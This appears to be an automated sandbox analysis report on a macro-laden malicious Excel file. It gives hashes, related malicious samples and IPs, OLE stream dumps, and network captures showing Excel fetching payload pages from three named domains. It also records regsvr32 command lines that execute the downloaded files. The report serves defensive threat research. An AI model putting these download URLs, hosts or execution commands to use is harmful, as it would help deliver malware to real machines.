                              QYUNlRkkn1.exeGet hashmaliciousBrowse
                              • 203.16.60.34
                              6Y5P9BoimMLclbt.exeGet hashmaliciousBrowse
                              • 101.0.117.102
                              gunzipped.exeGet hashmaliciousBrowse
                              • 101.0.117.102
                              SecuriteInfo.com.Variant.Bulz.627351.21436.exeGet hashmaliciousBrowse
                              • 101.0.117.102
                              ENQUIRY.exeGet hashmaliciousBrowse
                              • 101.0.117.102
                              16wKmiVoPj05ynr.exeGet hashmaliciousBrowse
                              • 101.0.117.102
                              PURCHASE ORDER.exeGet hashmaliciousBrowse
                              • 101.0.117.102
                              PO.NO.V21015.exeGet hashmaliciousBrowse
                              • 101.0.117.102
                              New Inquiry 21411JA20pdf.exeGet hashmaliciousBrowse
                              • 101.0.117.102
                              UNIFIEDLAYER-AS-1USdoc-220808714.xlsGet hashmaliciousBrowse
                              • 108.179.242.179
                              doc-220808714.xlsGet hashmaliciousBrowse
                              • 108.179.242.179
                              jjBv8SpZXm.exeGet hashmaliciousBrowse
                              • 192.185.0.218
                              Scan_0978.exeGet hashmaliciousBrowse
                              • 173.254.94.114
                              pKD3j672HL.exeGet hashmaliciousBrowse
                              • 192.185.131.113
                              heiedrNhQ8Get hashmaliciousBrowse
                              • 142.5.140.216
                              Kredi Karti Hesap #U00d6zeti - 4508xxxxxxxx0017.exeGet hashmaliciousBrowse
                              • 192.185.163.68
                              lod2.xlsxGet hashmaliciousBrowse
                              • 162.241.226.37
                              Contract and PO No.908876.exeGet hashmaliciousBrowse
                              • 192.185.84.191
                              iwah6jVhmwGet hashmaliciousBrowse
                              • 98.130.22.83
                              BL-210915L0.exeGet hashmaliciousBrowse
                              • 192.254.180.165
                              mFKC2tSCJXGet hashmaliciousBrowse
                              • 76.163.226.11
                              Urgent Inquiry.exeGet hashmaliciousBrowse
                              • 192.185.84.191
                              PO 007661721.exeGet hashmaliciousBrowse
                              • 192.185.84.191
                              P.I 099880990.xlsxGet hashmaliciousBrowse
                              • 162.214.65.211
                              1QbmrgleyAWkb39.exeGet hashmaliciousBrowse
                              • 192.185.84.191
                              (RG25LGSJ).exeGet hashmaliciousBrowse
                              • 162.241.216.179
                              103 Ref 2853801324189923.exeGet hashmaliciousBrowse
                              • 67.20.76.184
                              doc_0862413890.exeGet hashmaliciousBrowse
                              • 74.220.199.6
                              swift.Telex.xlsGet hashmaliciousBrowse
                              • 192.185.115.3

                              JA3 Fingerprints

                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                              7dcce5b76c8b17472d024758970a406bdoc-220808714.xlsGet hashmaliciousBrowse
                              • 101.0.112.4
                              • 108.179.242.179
                              • 172.93.99.178
                              INV.pptGet hashmaliciousBrowse
                              • 101.0.112.4
                              • 108.179.242.179
                              • 172.93.99.178
                              Purchase Order .xlsxGet hashmaliciousBrowse
                              • 101.0.112.4
                              • 108.179.242.179
                              • 172.93.99.178
                              MV JOLLY EXPRESS.docxGet hashmaliciousBrowse
                              • 101.0.112.4
                              • 108.179.242.179
                              • 172.93.99.178
                              DHL_Delivery_Notification.docGet hashmaliciousBrowse
                              • 101.0.112.4
                              • 108.179.242.179
                              • 172.93.99.178
                              FedEx AWB 884174658339.docGet hashmaliciousBrowse
                              • 101.0.112.4
                              • 108.179.242.179
                              • 172.93.99.178
                              UPDATE INVOICE FM K & S INDUSTRY.docxGet hashmaliciousBrowse
                              • 101.0.112.4
                              • 108.179.242.179
                              • 172.93.99.178
                              PO 347391.docxGet hashmaliciousBrowse
                              • 101.0.112.4
                              • 108.179.242.179
                              • 172.93.99.178
                              swift.Telex.xlsGet hashmaliciousBrowse
                              • 101.0.112.4
                              • 108.179.242.179
                              • 172.93.99.178
                              Invoice number 1257MAJAKFVII2021 incl. VAT.docGet hashmaliciousBrowse
                              • 101.0.112.4
                              • 108.179.242.179
                              • 172.93.99.178
                              Consignment Notification.docGet hashmaliciousBrowse
                              • 101.0.112.4
                              • 108.179.242.179
                              • 172.93.99.178
                              RFQ87976VF.docGet hashmaliciousBrowse
                              • 101.0.112.4
                              • 108.179.242.179
                              • 172.93.99.178
                              RFQPTD0075453423.docGet hashmaliciousBrowse
                              • 101.0.112.4
                              • 108.179.242.179
                              • 172.93.99.178
                              F#U0130YAT TEKL#U0130F#U0130 FORMU.docGet hashmaliciousBrowse
                              • 101.0.112.4
                              • 108.179.242.179
                              • 172.93.99.178
                              CONTRACT 0902021.docGet hashmaliciousBrowse
                              • 101.0.112.4
                              • 108.179.242.179
                              • 172.93.99.178
                              PO006237_2nd Shipment.docxGet hashmaliciousBrowse
                              • 101.0.112.4
                              • 108.179.242.179
                              • 172.93.99.178
                              sample.exeGet hashmaliciousBrowse
                              • 101.0.112.4
                              • 108.179.242.179
                              • 172.93.99.178
                              avec.xlsxGet hashmaliciousBrowse
                              • 101.0.112.4
                              • 108.179.242.179
                              • 172.93.99.178
                              SecuriteInfo.com.Trojan.GenericKD.37622653.5338.xlsmGet hashmaliciousBrowse
                              • 101.0.112.4
                              • 108.179.242.179
                              • 172.93.99.178
                              SecuriteInfo.com.Trojan.GenericKD.37622653.5338.xlsmGet hashmaliciousBrowse
                              • 101.0.112.4
                              • 108.179.242.179
                              • 172.93.99.178

                              Dropped Files

                              No context

                              Created / dropped Files

                              No created / dropped files found

                              Static File Info

                              General

                              File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Name of Creating Application: Microsoft Excel, Create Time/Date: Fri Jun 5 19:19:34 2015, Last Saved Time/Date: Tue Oct 12 08:22:59 2021, Security: 0
                              Entropy (8bit):7.531872402672375
                              TrID:
                              • Microsoft Excel sheet (30009/1) 78.94%
                              • Generic OLE2 / Multistream Compound File (8008/1) 21.06%
                              File name:doc-379851424.xls
                              File size:241152
                              MD5:6941299c6a83bb6ae73f5a9ef8eefb4d
                              SHA1:c1de6800c74673520fbc4c15d5ab67af1ef84de9
                              SHA256:346ac88b13c71aeb67501f63940919f60ad502d6d350016aecaa2ef4ec3c1d75
                              SHA512:9958f900b13bf435bf1676fb15d1c3eda8b245f1bfc478873d8370afd321f7543b10453f0d763a095146664afe3dcb42708debcf6b00b50e0099740a028c5ef2
                              SSDEEP:6144:cKpb8rGYrMPe3q7Q0XV5xtuEsi8/dgq9jWXcZZRBTq1BOzTwvOsPDslAvS32vI75:09jVzTmszTwvTDy33LvfP1OW7
                              File Content Preview:........................>......................................................................................................................................................................................................................................

                              File Icon

                              Icon Hash:e4eea286a4b4bcb4

                              Static OLE Info

                              General

                              Document Type:OLE
                              Number of OLE Files:1

                              OLE File "doc-379851424.xls"

                              Indicators

                              Has Summary Info:True
                              Application Name:Microsoft Excel
                              Encrypted Document:False
                              Contains Word Document Stream:False
                              Contains Workbook/Book Stream:True
                              Contains PowerPoint Document Stream:False
                              Contains Visio Document Stream:False
                              Contains ObjectPool Stream:
                              Flash Objects Count:
                              Contains VBA Macros:True

                              Summary

                              Code Page:1251
                              Author:
                              Last Saved By:
                              Create Time:2015-06-05 18:19:34
                              Last Saved Time:2021-10-12 07:22:59
                              Creating Application:Microsoft Excel
                              Security:0

                              Document Summary

                              Document Code Page:1251
                              Thumbnail Scaling Desired:False
                              Company:
                              Contains Dirty Links:False
                              Shared Document:False
                              Changed Hyperlinks:False
                              Application Version:1048576

                              Streams

                              Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
                              General
                              Stream Path:\x5DocumentSummaryInformation
                              File Type:data
                              Stream Size:4096
                              Entropy:0.43766981378
                              Base64 Encoded:False
                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . < . . . . . . . . . . . P . . . . . . . X . . . . . . . d . . . . . . . l . . . . . . . t . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t . . . . . S i m b b 1 . . . . . S i m b b 2 . . . . . S i m b b 3 . . . . . G G T . . . . . B r e r 1
                              Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 3c 01 00 00 09 00 00 00 01 00 00 00 50 00 00 00 0f 00 00 00 58 00 00 00 17 00 00 00 64 00 00 00 0b 00 00 00 6c 00 00 00 10 00 00 00 74 00 00 00 13 00 00 00 7c 00 00 00 16 00 00 00 84 00 00 00 0d 00 00 00 8c 00 00 00 0c 00 00 00 f9 00 00 00
                              Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096
                              General
                              Stream Path:\x5SummaryInformation
                              File Type:data
                              Stream Size:4096
                              Entropy:0.279171118094
                              Base64 Encoded:False
                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . X . . . . . . . h . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . ? R , . . . . @ . . . . . . . 9 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                              Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 a0 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 58 00 00 00 12 00 00 00 68 00 00 00 0c 00 00 00 80 00 00 00 0d 00 00 00 8c 00 00 00 13 00 00 00 98 00 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 08 00 00 00
                              Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 229526
                              General
                              Stream Path:Workbook
                              File Type:Applesoft BASIC program data, first line number 16
                              Stream Size:229526
                              Entropy:7.71393359025
                              Base64 Encoded:True
                              Data ASCII:. . . . . . . . Z O . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . . . 4 . < . 8 . = . B . . . . . a . . . . . . . . . = . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . . . . V e 1 8 . . . . . . . X . @ . . . . .
                              Data Raw:09 08 10 00 00 06 05 00 5a 4f cd 07 c9 00 02 00 06 08 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 05 00 01 10 04 34 04 3c 04 38 04 3d 04 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

                              Network Behavior

                              Network Port Distribution

                              TCP Packets

                              TimestampSource PortDest PortSource IPDest IP
                              Oct 12, 2021 17:46:37.731816053 CEST49167443192.168.2.22172.93.99.178
                              Oct 12, 2021 17:46:37.731873989 CEST44349167172.93.99.178192.168.2.22
                              Oct 12, 2021 17:46:37.731946945 CEST49167443192.168.2.22172.93.99.178
                              Oct 12, 2021 17:46:37.741429090 CEST49167443192.168.2.22172.93.99.178
                              Oct 12, 2021 17:46:37.741477966 CEST44349167172.93.99.178192.168.2.22
                              Oct 12, 2021 17:46:37.958718061 CEST44349167172.93.99.178192.168.2.22
                              Oct 12, 2021 17:46:37.958910942 CEST49167443192.168.2.22172.93.99.178
                              Oct 12, 2021 17:46:37.974195004 CEST49167443192.168.2.22172.93.99.178
                              Oct 12, 2021 17:46:37.974225044 CEST44349167172.93.99.178192.168.2.22
                              Oct 12, 2021 17:46:37.974667072 CEST44349167172.93.99.178192.168.2.22
                              Oct 12, 2021 17:46:37.974770069 CEST49167443192.168.2.22172.93.99.178
                              Oct 12, 2021 17:46:38.221590042 CEST49167443192.168.2.22172.93.99.178
                              Oct 12, 2021 17:46:38.267215014 CEST44349167172.93.99.178192.168.2.22
                              Oct 12, 2021 17:46:39.486504078 CEST44349167172.93.99.178192.168.2.22
                              Oct 12, 2021 17:46:39.486603975 CEST44349167172.93.99.178192.168.2.22
                              Oct 12, 2021 17:46:39.488837004 CEST49167443192.168.2.22172.93.99.178
                              Oct 12, 2021 17:46:39.488869905 CEST49167443192.168.2.22172.93.99.178
                              Oct 12, 2021 17:46:39.488886118 CEST49167443192.168.2.22172.93.99.178
                              Oct 12, 2021 17:46:39.488903999 CEST44349167172.93.99.178192.168.2.22
                              Oct 12, 2021 17:46:39.488924980 CEST49167443192.168.2.22172.93.99.178
                              Oct 12, 2021 17:46:39.489058018 CEST49167443192.168.2.22172.93.99.178
                              Oct 12, 2021 17:46:39.530090094 CEST49168443192.168.2.22101.0.112.4
                              Oct 12, 2021 17:46:39.530153036 CEST44349168101.0.112.4192.168.2.22
                              Oct 12, 2021 17:46:39.530420065 CEST49168443192.168.2.22101.0.112.4
                              Oct 12, 2021 17:46:39.530864954 CEST49168443192.168.2.22101.0.112.4
                              Oct 12, 2021 17:46:39.530893087 CEST44349168101.0.112.4192.168.2.22
                              Oct 12, 2021 17:46:40.154512882 CEST44349168101.0.112.4192.168.2.22
                              Oct 12, 2021 17:46:40.154759884 CEST49168443192.168.2.22101.0.112.4
                              Oct 12, 2021 17:46:40.171739101 CEST49168443192.168.2.22101.0.112.4
                              Oct 12, 2021 17:46:40.171807051 CEST44349168101.0.112.4192.168.2.22
                              Oct 12, 2021 17:46:40.172147036 CEST44349168101.0.112.4192.168.2.22
                              Oct 12, 2021 17:46:40.172211885 CEST49168443192.168.2.22101.0.112.4
                              Oct 12, 2021 17:46:40.186595917 CEST49168443192.168.2.22101.0.112.4
                              Oct 12, 2021 17:46:40.227163076 CEST44349168101.0.112.4192.168.2.22
                              Oct 12, 2021 17:46:42.883939981 CEST44349168101.0.112.4192.168.2.22
                              Oct 12, 2021 17:46:42.884030104 CEST44349168101.0.112.4192.168.2.22
                              Oct 12, 2021 17:46:42.884181976 CEST49168443192.168.2.22101.0.112.4
                              Oct 12, 2021 17:46:42.884416103 CEST49168443192.168.2.22101.0.112.4
                              Oct 12, 2021 17:46:42.884442091 CEST44349168101.0.112.4192.168.2.22
                              Oct 12, 2021 17:46:42.884450912 CEST49168443192.168.2.22101.0.112.4
                              Oct 12, 2021 17:46:42.884588003 CEST49168443192.168.2.22101.0.112.4
                              Oct 12, 2021 17:46:42.924036026 CEST49169443192.168.2.22108.179.242.179
                              Oct 12, 2021 17:46:42.924082994 CEST44349169108.179.242.179192.168.2.22
                              Oct 12, 2021 17:46:42.924520969 CEST49169443192.168.2.22108.179.242.179
                              Oct 12, 2021 17:46:42.924882889 CEST49169443192.168.2.22108.179.242.179
                              Oct 12, 2021 17:46:42.924913883 CEST44349169108.179.242.179192.168.2.22
                              Oct 12, 2021 17:46:43.210398912 CEST44349169108.179.242.179192.168.2.22
                              Oct 12, 2021 17:46:43.210613012 CEST49169443192.168.2.22108.179.242.179
                              Oct 12, 2021 17:46:43.221973896 CEST49169443192.168.2.22108.179.242.179
                              Oct 12, 2021 17:46:43.221998930 CEST44349169108.179.242.179192.168.2.22
                              Oct 12, 2021 17:46:43.222524881 CEST44349169108.179.242.179192.168.2.22
                              Oct 12, 2021 17:46:43.222641945 CEST49169443192.168.2.22108.179.242.179
                              Oct 12, 2021 17:46:43.227133036 CEST49169443192.168.2.22108.179.242.179
                              Oct 12, 2021 17:46:43.271150112 CEST44349169108.179.242.179192.168.2.22
                              Oct 12, 2021 17:46:43.512882948 CEST44349169108.179.242.179192.168.2.22
                              Oct 12, 2021 17:46:43.513025999 CEST44349169108.179.242.179192.168.2.22
                              Oct 12, 2021 17:46:43.513314009 CEST49169443192.168.2.22108.179.242.179
                              Oct 12, 2021 17:46:43.513653040 CEST49169443192.168.2.22108.179.242.179
                              Oct 12, 2021 17:46:43.513676882 CEST44349169108.179.242.179192.168.2.22

                              UDP Packets

                              TimestampSource PortDest PortSource IPDest IP
                              Oct 12, 2021 17:46:37.704974890 CEST5216753192.168.2.228.8.8.8
                              Oct 12, 2021 17:46:37.723443985 CEST53521678.8.8.8192.168.2.22
                              Oct 12, 2021 17:46:39.509283066 CEST5059153192.168.2.228.8.8.8
                              Oct 12, 2021 17:46:39.527527094 CEST53505918.8.8.8192.168.2.22
                              Oct 12, 2021 17:46:42.902844906 CEST5780553192.168.2.228.8.8.8
                              Oct 12, 2021 17:46:42.921427965 CEST53578058.8.8.8192.168.2.22

                              DNS Queries

                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                              Oct 12, 2021 17:46:37.704974890 CEST192.168.2.228.8.8.80xdca1Standard query (0)ohemaa.orgA (IP address)IN (0x0001)
                              Oct 12, 2021 17:46:39.509283066 CEST192.168.2.228.8.8.80x96b1Standard query (0)madieandme.com.auA (IP address)IN (0x0001)
                              Oct 12, 2021 17:46:42.902844906 CEST192.168.2.228.8.8.80x5bc0Standard query (0)amerident.com.doA (IP address)IN (0x0001)

                              DNS Answers

                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                              Oct 12, 2021 17:46:37.723443985 CEST8.8.8.8192.168.2.220xdca1No error (0)ohemaa.org172.93.99.178A (IP address)IN (0x0001)
                              Oct 12, 2021 17:46:39.527527094 CEST8.8.8.8192.168.2.220x96b1No error (0)madieandme.com.au101.0.112.4A (IP address)IN (0x0001)
                              Oct 12, 2021 17:46:42.921427965 CEST8.8.8.8192.168.2.220x5bc0No error (0)amerident.com.do108.179.242.179A (IP address)IN (0x0001)

                              HTTP Request Dependency Graph

                              • ohemaa.org
                              • madieandme.com.au
                              • amerident.com.do

                              HTTPS Proxied Packets

                              Session IDSource IPSource PortDestination IPDestination PortProcess
                              0192.168.2.2249167172.93.99.178443C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                              TimestampkBytes transferredDirectionData
                              2021-10-12 15:46:38 UTC0OUTGET /HUVm9mDKLW9C/ocrafhh.html HTTP/1.1
                              Accept: */*
                              UA-CPU: AMD64
                              Accept-Encoding: gzip, deflate
                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                              Host: ohemaa.org
                              Connection: Keep-Alive
                              2021-10-12 15:46:39 UTC0INHTTP/1.1 200 OK
                              Connection: close
                              x-powered-by: PHP/5.6.40
                              content-type: text/html; charset=UTF-8
                              content-length: 0
                              date: Tue, 12 Oct 2021 15:46:39 GMT
                              server: LiteSpeed
                              alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"


                              Session IDSource IPSource PortDestination IPDestination PortProcess
                              1192.168.2.2249168101.0.112.4443C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                              TimestampkBytes transferredDirectionData
                              2021-10-12 15:46:40 UTC0OUTGET /xnkpOLnvlN6T/ocrafh.html HTTP/1.1
                              Accept: */*
                              UA-CPU: AMD64
                              Accept-Encoding: gzip, deflate
                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                              Host: madieandme.com.au
                              Connection: Keep-Alive
                              2021-10-12 15:46:42 UTC1INHTTP/1.1 200 OK
                              Connection: close
                              x-powered-by: PHP/7.2.34
                              content-type: text/html; charset=UTF-8
                              content-length: 0
                              date: Tue, 12 Oct 2021 15:46:42 GMT
                              server: LiteSpeed
                              vary: User-Agent
                              alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"


                              Session IDSource IPSource PortDestination IPDestination PortProcess
                              2192.168.2.2249169108.179.242.179443C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                              TimestampkBytes transferredDirectionData
                              2021-10-12 15:46:43 UTC1OUTGET /xdOMlaB0XJ7/ocraf.html HTTP/1.1
                              Accept: */*
                              UA-CPU: AMD64
                              Accept-Encoding: gzip, deflate
                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                              Host: amerident.com.do
                              Connection: Keep-Alive
                              2021-10-12 15:46:43 UTC1INHTTP/1.1 200 OK
                              Date: Tue, 12 Oct 2021 15:46:43 GMT
                              Server: nginx/1.19.10
                              Content-Type: text/html; charset=UTF-8
                              Content-Length: 0
                              X-Server-Cache: true
                              X-Proxy-Cache: HIT
                              Connection: close


                              Code Manipulations

                              Statistics

                              CPU Usage

                              Click to jump to process

                              Memory Usage

                              Click to jump to process

                              High Level Behavior Distribution

                              Click to dive into process behavior distribution

                              Behavior

                              Click to jump to process

                              System Behavior

                              General

                              Start time:17:46:27
                              Start date:12/10/2021
                              Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                              Wow64 process (32bit):false
                              Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                              Imagebase:0x13fa70000
                              File size:28253536 bytes
                              MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:moderate

                              General

                              Start time:17:46:35
                              Start date:12/10/2021
                              Path:C:\Windows\System32\regsvr32.exe
                              Wow64 process (32bit):false
                              Commandline:'C:\Windows\System32\regsvr32.exe' C:\Datop\test.test
                              Imagebase:0xffc30000
                              File size:19456 bytes
                              MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high

                              General

                              Start time:17:46:35
                              Start date:12/10/2021
                              Path:C:\Windows\System32\regsvr32.exe
                              Wow64 process (32bit):false
                              Commandline:'C:\Windows\System32\regsvr32.exe' C:\Datop\test1.test
                              Imagebase:0xffc30000
                              File size:19456 bytes
                              MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high

                              General

                              Start time:17:46:36
                              Start date:12/10/2021
                              Path:C:\Windows\System32\regsvr32.exe
                              Wow64 process (32bit):false
                              Commandline:'C:\Windows\System32\regsvr32.exe' C:\Datop\test2.test
                              Imagebase:0xffc30000
                              File size:19456 bytes
                              MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high

                              Disassembly

                              Code Analysis

                              Reset < >